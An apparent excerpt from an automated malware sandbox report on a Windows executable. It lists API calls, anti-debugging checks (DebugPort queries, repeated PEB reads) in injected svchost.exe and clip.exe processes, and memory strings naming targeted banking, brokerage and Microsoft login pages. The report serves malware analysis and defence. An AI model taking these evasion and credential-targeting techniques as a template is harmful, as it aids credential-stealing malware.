            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00851C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00851C8A
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00851F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00851F94
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0081DDC0
            Source: 5-19-2H.7.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: 5-19-2H.7.drBinary or memory string: discord.comVMware20,11696494690f
            Source: 5-19-2H.7.drBinary or memory string: AMC password management pageVMware20,11696494690
            Source: 5-19-2H.7.drBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: 5-19-2H.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: 5-19-2H.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: 5-19-2H.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: 5-19-2H.7.drBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: 5-19-2H.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: 5-19-2H.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: 5-19-2H.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: 5-19-2H.7.drBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: 5-19-2H.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: 5-19-2H.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: 5-19-2H.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: 5-19-2H.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: 5-19-2H.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: WNGaDiurNI.exe, 00000008.00000002.2718154078.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000A.00000002.2266940308.00000241F6CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 5-19-2H.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: 5-19-2H.7.drBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: 5-19-2H.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: 5-19-2H.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
            Source: 5-19-2H.7.drBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: 5-19-2H.7.drBinary or memory string: global block list test formVMware20,11696494690
            Source: 5-19-2H.7.drBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: 5-19-2H.7.drBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: 5-19-2H.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: 5-19-2H.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: 5-19-2H.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: 5-19-2H.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: 5-19-2H.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: 5-19-2H.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0307096E rdtsc 2_2_0307096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172D3 LdrLoadDll,2_2_004172D3
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00856AAF BlockInput,0_2_00856AAF
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00803D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00803D19
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00833920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00833920
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081E01E LoadLibraryA,GetProcAddress,0_2_0081E01E
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_011B4010 mov eax, dword ptr fs:[00000030h]0_2_011B4010
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_011B2990 mov eax, dword ptr fs:[00000030h]0_2_011B2990
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_011B3FB0 mov eax, dword ptr fs:[00000030h]0_2_011B3FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A30B mov eax, dword ptr fs:[00000030h]2_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C310 mov ecx, dword ptr fs:[00000030h]2_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03050310 mov ecx, dword ptr fs:[00000030h]2_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov ecx, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03108324 mov eax, dword ptr fs:[00000030h]2_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B2349 mov eax, dword ptr fs:[00000030h]2_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov ecx, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B035C mov eax, dword ptr fs:[00000030h]2_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FA352 mov eax, dword ptr fs:[00000030h]2_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8350 mov ecx, dword ptr fs:[00000030h]2_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310634F mov eax, dword ptr fs:[00000030h]2_2_0310634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D437C mov eax, dword ptr fs:[00000030h]2_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E388 mov eax, dword ptr fs:[00000030h]2_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305438F mov eax, dword ptr fs:[00000030h]2_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03028397 mov eax, dword ptr fs:[00000030h]2_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC3CD mov eax, dword ptr fs:[00000030h]2_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]2_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov ecx, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE3DB mov eax, dword ptr fs:[00000030h]2_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310625D mov eax, dword ptr fs:[00000030h]2_2_0310625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA250 mov eax, dword ptr fs:[00000030h]2_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031062D6 mov eax, dword ptr fs:[00000030h]2_2_031062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov eax, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DE10E mov ecx, dword ptr fs:[00000030h]2_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]2_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
